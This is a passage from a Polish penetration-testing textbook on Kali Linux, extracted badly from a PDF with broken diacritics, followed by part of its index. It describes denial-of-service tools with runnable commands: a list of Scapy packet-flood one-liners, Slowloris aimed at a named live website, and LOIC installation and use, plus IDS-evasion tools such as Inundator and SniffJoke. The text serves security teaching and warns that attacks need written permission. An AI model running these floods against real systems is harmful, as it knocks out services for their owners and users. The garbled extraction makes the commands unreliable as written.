W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
